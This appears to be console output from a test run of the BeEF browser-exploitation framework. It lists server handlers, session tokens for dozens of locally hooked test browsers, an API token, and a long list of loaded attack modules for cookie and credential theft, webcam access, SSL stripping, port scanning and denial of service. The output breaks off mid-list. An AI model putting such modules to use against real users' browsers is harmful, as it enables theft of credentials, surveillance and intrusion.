'/init' +[12:25:25][>] Server: mounted handler '/' +[12:25:25][>] Server: mounted handler '/dh' +[12:25:25][>] Server: mounted handler '/api/hooks' +[12:25:25][>] Server: mounted handler '/api/browserdetails' +[12:25:25][>] Server: mounted handler '/api/modules' +[12:25:25][>] Server: mounted handler '/api/categories' +[12:25:25][>] Server: mounted handler '/api/logs' +[12:25:25][>] Server: mounted handler '/api/admin' +[12:25:25][>] Server: mounted handler '/api/server' +[12:25:25][>] Server: mounted handler '/api/autorun' +[12:25:25][>] Server: mounted handler '/api/dns' +[12:25:25][>] Server: mounted handler '/api/ipec' +[12:25:25][>] Server: mounted handler '/api/proxy' +[12:25:25][>] Server: mounted handler '/requester' +[12:25:25][>] Server: mounted handler '/api/requester' +[12:25:25][>] Server: mounted handler '/xssrays' +[12:25:25][>] Server: mounted handler '/api/xssrays' +[12:25:25][!] API Fire Error: undefined method `[]' for nil:NilClass in {:owner=>BeEF::Extension::Dns::API::NameserverHandler, :id=>11}.pre_http_start() +[12:25:25][*] HTTP Proxy: http://: +[12:25:25][!] API Fire Error: undefined method `each' for nil:NilClass in {:owner=>BeEF::Extension::Qrcode::QrcodeGenerator, :id=>16}.pre_http_start() +{"hooked-browsers"=>{"online"=>{}, "offline"=>{"0"=>{"id"=>1, "session"=>"EmDYRNIK1Ler0dtC1C8pJQrcCcHNLPXPrt4JKd7acnYAwrfB74TODbREBf778NdpX5Wr7vv434bcdSbm", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Virtual Machine", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586394267", "lastseen"=>"1587000539", "date_stamp"=>"Thu Apr 09 2020 11:04:27 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "1"=>{"id"=>2, "session"=>"S3pD3sJjSjgjbpCDXOsWZg6iHLpy1iKWKA55qdQZ7rJQybtvA2loKYkxHt4Ed6lWlwLbxTDoksol2cP7", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586400895", "lastseen"=>"1586400946", "date_stamp"=>"Thu Apr 09 2020 12:54:55 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "2"=>{"id"=>6, "session"=>"HzyGSniVQteRI1J7k6tTKjld9TeT0cvcXjumfq8gdzJbtmGcMphdwDpNeFMZicYZo4bRP41ppF2L69CP", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586418154", "lastseen"=>"1586418155", "date_stamp"=>"Thu Apr 09 2020 17:42:34 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "3"=>{"id"=>20, "session"=>"RUjYfzi4TVoLyYhqGGO6zTCpKhd4CV5d1Uk2ZJB3JkoBq5ftHRqZQKdKioc0NA1GEdfNRLwhz925aINI", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586823088", "lastseen"=>"1586823133", "date_stamp"=>"Tue Apr 14 2020 10:11:28 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "4"=>{"id"=>21, "session"=>"E3XCCLrCpMp0Hvq1FKbFyuCMA0GH6l8vjg2btjzNIBwbWbzsaVUuHCJ5HJriCa2YOM14wjuSfxXsqq2M", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586823176", "lastseen"=>"1586823181", "date_stamp"=>"Tue Apr 14 2020 10:12:56 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "5"=>{"id"=>22, "session"=>"MjK3oK2VXh51kdtApZv3VFigB8JOv1O233r2XxSgefqNn2qQfEw4znfQXBrjKpmJrLhnCZZRqGSxU2SZ", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586823759", "lastseen"=>"1586823767", "date_stamp"=>"Tue Apr 14 2020 10:22:39 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "6"=>{"id"=>23, "session"=>"Kurawnld1luO8DK8qcJFbo7v533MlfanGr76e9b1DEa2HcSDUzSnxfTVVrhUHeV0Mcx0ciLA2MZiyKEs", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586823901", "lastseen"=>"1586823909", "date_stamp"=>"Tue Apr 14 2020 10:25:01 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "7"=>{"id"=>24, "session"=>"p1Q5TOCFVMuylZfBhksna1NvPR4a04Ad7QbPomb4PHRUacviwkOOPPMjKPPmUXzx0HeUfCcycJb2j3Sq", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586824045", "lastseen"=>"1586824055", "date_stamp"=>"Tue Apr 14 2020 10:27:25 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "8"=>{"id"=>25, "session"=>"3Kbgs99XkM5Am0f0gOfz2CGFoJG8n8i1T0TIKegBinXLUlkZlUDms9VVNlNxBHnQmFVwmYsrrzlekyR6", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586824655", "lastseen"=>"1586824660", "date_stamp"=>"Tue Apr 14 2020 10:37:35 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "9"=>{"id"=>26, "session"=>"bSelA6lviGwncwjYz5V94T7ro5Y0hccwiSG5BNlKEvKZAkCKtS9QJxqZHxRq0ftH4yscih8wS9Q6E7VC", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586824702", "lastseen"=>"1586824707", "date_stamp"=>"Tue Apr 14 2020 10:38:22 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "10"=>{"id"=>27, "session"=>"MukAOldO09rn7xS5l4wg4WwFGLSgfXBToe5Gg1D9YFYiqTv4v7nYApweeKcLyC2q2Umv28DvN4tIELb6", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586825120", "lastseen"=>"1586825125", "date_stamp"=>"Tue Apr 14 2020 10:45:20 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "11"=>{"id"=>28, "session"=>"SUBKyTPClGhHJnrm4y0SFaDSXhxCnwLoZKf4MbApBSyLTY0UclIdzZR4mPH8CajcevHVGRf6ab5lTBzv", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586825334", "lastseen"=>"1586825339", "date_stamp"=>"Tue Apr 14 2020 10:48:53 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "12"=>{"id"=>29, "session"=>"wnrdDzrnDFYUDMvtofqft63243mefwC4BSelGtLLjdDMiygmYiybwyw0fDDnsHxzKxjYRDw7XF5d90vD", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586825653", "lastseen"=>"1586825659", "date_stamp"=>"Tue Apr 14 2020 10:54:13 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "13"=>{"id"=>30, "session"=>"X0AOIAjGxN0jJGds4d8f7jYdkWs0EotnaygCnLv9KEkHga5O4vtQrOTi4CzzFX8ZNxFwnqrcfBlpNF7u", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586911812", "lastseen"=>"1586911817", "date_stamp"=>"Wed Apr 15 2020 10:50:12 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "14"=>{"id"=>31, "session"=>"NKaX3YSA62A6ag0yIr7QHBe4FmAnN7QgfupICVEwPUaDjWmHGxgbCAD4hdingsm27H82yvfr4CeOcw8I", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586915220", "lastseen"=>"1586915225", "date_stamp"=>"Wed Apr 15 2020 11:47:00 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "15"=>{"id"=>32, "session"=>"nKltmTSqFCmfCEitW5ZhI1fyahYvkEMsNSf6xdlSuCEtrebT5U6ineQXMn2cANPEFtDmVebCKMUNRse5", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586997085", "lastseen"=>"1586997090", "date_stamp"=>"Thu Apr 16 2020 10:31:25 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "16"=>{"id"=>34, "session"=>"2orczrZYqfGHQEX4DqVFrSd3n4ldHKyu5hoSxyxdWwrR1mc8HJWBIvADnbwz1aCMfbLjeIsi0rVNbunc", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586997178", "lastseen"=>"1586997183", "date_stamp"=>"Thu Apr 16 2020 10:32:58 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "17"=>{"id"=>35, "session"=>"HEfVx04GFlL4dtr5Hn5jOK4q8cXv6w3O6nSN384bWr3gREw6RAq98LtNEqKP5bn8RxbTUMjMFNsPNcaZ", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586999077", "lastseen"=>"1586999170", "date_stamp"=>"Thu Apr 16 2020 11:04:37 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "18"=>{"id"=>36, "session"=>"NIUDIFLnW5s8JJNPj1FESe5WdHWi8MUSRAjHnbp337EmMlrRpcIDsq7G3BOfvUfkHj3qi5O3j0WDZ8TT", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1586999554", "lastseen"=>"1586999950", "date_stamp"=>"Thu Apr 16 2020 11:12:34 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "19"=>{"id"=>37, "session"=>"un0tmccB7WwpKRoh6PlTX5YvWu1quQRrA2YVbkUZ29DQJR9t9YmMGY34Jitnn26WQywfOKg9mDF9wezP", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002303", "lastseen"=>"1587002383", "date_stamp"=>"Thu Apr 16 2020 11:58:23 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "20"=>{"id"=>38, "session"=>"cfAKdPS9dBNfVUGq1eeuubMh1ckjUhCTbg4sO5GjEQcTM4V5ZWlXv5FOgDyNaKykKbpN8FCkg6A8G7x9", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002320", "lastseen"=>"1587002383", "date_stamp"=>"Thu Apr 16 2020 11:58:40 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "21"=>{"id"=>39, "session"=>"yxfETQTrCWmbcMCNkO4wgwuOBYnfkPwGuLnvwf784IhRkPsXcUNSC3oPHAej782H1OR2S9yrojBbXQOw", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002334", "lastseen"=>"1587002383", "date_stamp"=>"Thu Apr 16 2020 11:58:54 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "22"=>{"id"=>40, "session"=>"ha5u1TArsoPZ8p8C7RmFAjKJex4Vlzh2R3GZYf9LpFSTzkjyw0b6uWJnG8Qvz79rAEulkBMhExoFbAMv", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002344", "lastseen"=>"1587002384", "date_stamp"=>"Thu Apr 16 2020 11:59:04 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "23"=>{"id"=>41, "session"=>"skS153phY1gsP9Da2S5lDrY0DFrwwIoXGVRkAil8c2GqNhWnmWzoBY2bQqjbTxmAicheQj8mu8L09fR8", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002479", "lastseen"=>"1587002659", "date_stamp"=>"Thu Apr 16 2020 12:01:19 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "24"=>{"id"=>42, "session"=>"739cAcKvtPraU2nHcDxWPW56lWS43sZ7LHaSjhklK3Pyf8u6E8o6JM1qBec8NB4hcCAC5159mcb9z9IH", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002497", "lastseen"=>"1587002658", "date_stamp"=>"Thu Apr 16 2020 12:01:37 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "25"=>{"id"=>43, "session"=>"QCIw89A5OeTE5wmlljF62KCMZjfDBDTGew8mZbNw8ZNU2JtN5UHougr9uQeFB8gtcKJnVoxYtisGYHmt", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002503", "lastseen"=>"1587002658", "date_stamp"=>"Thu Apr 16 2020 12:01:43 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "26"=>{"id"=>44, "session"=>"zPD5TEGGQOpSN76j6o13TGj5ShgqAuu2U9uyZRtYtOAzsEWwDaW1lWYQVwn5eznNK5UXem6JCazh4y0M", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002654", "lastseen"=>"1587002659", "date_stamp"=>"Thu Apr 16 2020 12:04:14 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "27"=>{"id"=>45, "session"=>"5tNjGYE8iYLvs1SE1mjFnb2T7aGvsaK3q9dT8os6y1QlgVUAfC9N4BFaHcoJbOLs1eUtMycHMLBQGvO5", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002780", "lastseen"=>"1587002856", "date_stamp"=>"Thu Apr 16 2020 12:06:20 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "28"=>{"id"=>46, "session"=>"dyxGyhoOBJ5ofXGpfyMwW5cQltFxDFTtCNGAIktraEqCmjgLJ6ZhWIiLiIDl4ZzuyBxm07HegMZJizaC", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002832", "lastseen"=>"1587002856", "date_stamp"=>"Thu Apr 16 2020 12:07:12 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "29"=>{"id"=>47, "session"=>"9SYxDBsTxxm6ChrKA9x4uAv4hU09oM1cPDwn6Bk2hiwXRKzIRbqCJFsRkISVHll133KiskmUGTf568Uu", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002845", "lastseen"=>"1587002856", "date_stamp"=>"Thu Apr 16 2020 12:07:25 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "30"=>{"id"=>48, "session"=>"zzE0XoJYHt6FagYZCBJJYjfZVuRRuWSRK8bU5ighMkIrv0kOjSjoM3YbASTiCkqAaa8QWVBMdP0rXHGz", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002853", "lastseen"=>"1587002856", "date_stamp"=>"Thu Apr 16 2020 12:07:33 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "31"=>{"id"=>49, "session"=>"beX3j5CtbIHAm9wbyREPHbwmw5sbq4wbRG9zEPd4DcIcX58pqsv2Txbq7hiAEbYIXPb0ACRt9n3kOiFZ", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587002920", "lastseen"=>"1587002925", "date_stamp"=>"Thu Apr 16 2020 12:08:40 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "32"=>{"id"=>50, "session"=>"D2eqzleYvJk00eqoiYqBX4PqECx75StryhNFssjvaGv5Shzj8ScIwoAttDtNwAYukI8T2H5I6uBW232z", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587003771", "lastseen"=>"1587003843", "date_stamp"=>"Thu Apr 16 2020 12:22:51 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "33"=>{"id"=>51, "session"=>"UrBt1Owdt8BxUUT5BF2vDiG51jMMgOX4xwwuPXAKyw31jrNdjCvs6obIhGCW4sudl1wPzAxBRLukHi8S", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587003785", "lastseen"=>"1587003843", "date_stamp"=>"Thu Apr 16 2020 12:23:05 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "34"=>{"id"=>52, "session"=>"e4GEegTS5ls8E2QWUEQvMYiiOIHs7W0UEZQopD2gCaaNg30FSNbf1aZBqYUtKaGrb1AieR0kwm7T9XIB", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587003791", "lastseen"=>"1587003844", "date_stamp"=>"Thu Apr 16 2020 12:23:10 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}, "35"=>{"id"=>53, "session"=>"zq4ykhGFTls1b2CYvYFBiWXCldd9OFrCU2GejMtNdFq4VYMLeof6GINglFtS0i700VpmoHHCHyfCoMke", "name"=>"FF", "version"=>"68", "platform"=>"Linux x86_64", "os"=>"Linux", "os_version"=>"", "hardware"=>"Laptop", "ip"=>"127.0.0.1", "domain"=>"localhost", "port"=>"3000", "page_uri"=>"http://localhost:3000/demos/basic.html", "firstseen"=>"1587003802", "lastseen"=>"1587003844", "date_stamp"=>"Thu Apr 16 2020 12:23:22 GMT+1000 (Australian Eastern Standard Time)", "city"=>"Unknown", "country"=>"Unknown", "country_code"=>nil}}}} + can successfully hook a browser +authenticated. api token: 0916b20132e5f6b405f404599ce44339f0128bfb +hooking a new victim, waiting a few seconds... + browser details handler working + +BeEF Modules + safe client debug log + safe variable decleration +[12:25:37][>] Soft Load module: 'internal_network_fingerprinting' +[12:25:37][>] Soft Load module: 'detect_burp' +[12:25:37][>] Soft Load module: 'get_http_servers' +[12:25:37][>] Soft Load module: 'detect_tor' +[12:25:37][>] Soft Load module: 'irc_nat_pinning' +[12:25:37][>] Soft Load module: 'get_ntop_network_hosts' +[12:25:37][>] Soft Load module: 'doser' +[12:25:37][>] Soft Load module: 'detect_soc_nets' +[12:25:37][>] Soft Load module: 'ping_sweep_ff' +[12:25:37][>] Soft Load module: 'cross_origin_scanner_cors' +[12:25:37][>] Soft Load module: 'dns_enumeration' +[12:25:37][>] Soft Load module: 'cross_origin_scanner_flash' +[12:25:37][>] Soft Load module: 'get_proxy_servers_wpad' +[12:25:37][>] Soft Load module: 'port_scanner' +[12:25:37][>] Soft Load module: 'fingerprint_routers' +[12:25:37][>] Soft Load module: 'ping_sweep' +[12:25:37][>] Soft Load module: 'f5_bigip_cookie_stealing' +[12:25:37][>] Soft Load module: 'f5_bigip_cookie_disclosure' +[12:25:37][>] Soft Load module: 'sw_port_scanner' +[12:25:37][>] Soft Load module: 'ping_sweep_java' +[12:25:37][>] Soft Load module: 'identify_lan_subnets' +[12:25:37][>] Soft Load module: 'dns_rebinding' +[12:25:37][>] Soft Load module: 'test_return_image' +[12:25:37][>] Soft Load module: 'test_network_request' +[12:25:37][>] Soft Load module: 'test_http_redirect' +[12:25:37][>] Soft Load module: 'test_return_ascii_chars' +[12:25:37][>] Soft Load module: 'test_dns_tunnel_client' +[12:25:37][>] Soft Load module: 'test_beef_debug' +[12:25:37][>] Soft Load module: 'test_get_variable' +[12:25:37][>] Soft Load module: 'test_return_long_string' +[12:25:37][>] Soft Load module: 'test_cors_request' +[12:25:37][>] Soft Load module: 'Detect_unity' +[12:25:37][>] Soft Load module: 'detect_office' +[12:25:37][>] Soft Load module: 'unhook' +[12:25:37][>] Soft Load module: 'avant_steal_history' +[12:25:37][>] Soft Load module: 'detect_wmp' +[12:25:37][>] Soft Load module: 'detect_vlc' +[12:25:37][>] Soft Load module: 'browser_fingerprinting' +[12:25:37][>] Soft Load module: 'webcam' +[12:25:37][>] Soft Load module: 'get_visited_domains' +[12:25:37][>] Soft Load module: 'detect_foxit' +[12:25:37][>] Soft Load module: 'Detect_toolbars' +[12:25:37][>] Soft Load module: 'detect_realplayer' +[12:25:37][>] Soft Load module: 'detect_quicktime' +[12:25:37][>] Soft Load module: 'get_visited_urls' +[12:25:37][>] Soft Load module: 'fingerprint_browser' +[12:25:37][>] Soft Load module: 'remove_hook_element' +[12:25:37][>] Soft Load module: 'detect_lastpass' +[12:25:37][>] Soft Load module: 'detect_simple_adblock' +[12:25:37][>] Soft Load module: 'webcam_html5' +[12:25:37][>] Soft Load module: 'get_page_html_iframe' +[12:25:37][>] Soft Load module: 'link_rewrite_sslstrip' +[12:25:37][>] Soft Load module: 'rickroll' +[12:25:37][>] Soft Load module: 'link_rewrite_click_events' +[12:25:37][>] Soft Load module: 'prompt_dialog' +[12:25:37][>] Soft Load module: 'get_form_values' +[12:25:37][>] Soft Load module: 'ajax_fingerprint' +[12:25:37][>] Soft Load module: 'deface_web_page_component' +[12:25:37][>] Soft Load module: 'mobilesafari_address_spoofing' +[12:25:37][>] Soft Load module: 'deface_web_page' +[12:25:37][>] Soft Load module: 'link_rewrite' +[12:25:37][>] Soft Load module: 'get_stored_credentials' +[12:25:37][>] Soft Load module: 'link_rewrite_tel' +[12:25:37][>] Soft Load module: 'remove_stuck_iframes' +[12:25:37][>] Soft Load module: 'get_cookie' +[12:25:37][>] Soft Load module: 'clear_console' +[12:25:37][>] Soft Load module: 'alert_dialog' +[12:25:37][>] Soft Load module: 'site_redirect' +[12:25:37][>] Soft Load module: 'site_redirect_iframe' +[12:25:37][>] Soft Load module: 'get_local_storage' +[12:25:37][>] Soft Load module: 'replace_video' +[12:25:37][>] Soft Load module: 'overflow_cookiejar' +[12:25:37][>] Soft Load module: 'get_page_html' +[12:25:37][>] Soft Load module: 'get_page_links' +[12:25:37][>] Soft Load module: 'get_session_storage' +[12:25:37][>] Soft Load module: 'disable_developer_tools' +[12:25:37][>] Soft Load module: 'detect_silverlight' +[12:25:37][>] Soft Load module: 'detect_mime_types' +[12:25:37][>] Soft Load module: 'webcam_permission_check' +[12:25:37][>] Soft Load module: 'detect_extensions' +[12:25:37][>] Soft Load module: 'detect_unsafe_activex' +[12:25:37][>] Soft Load module: 'detect_activex' +[12:25:37][>] Soft Load module: 'spyder_eye' +[12:25:37][>] Soft Load module: 'Play_sound' +[12:25:37][>] Soft Load module: 'detect_popup_blocker' +[12:25:37][>] Soft Load module: 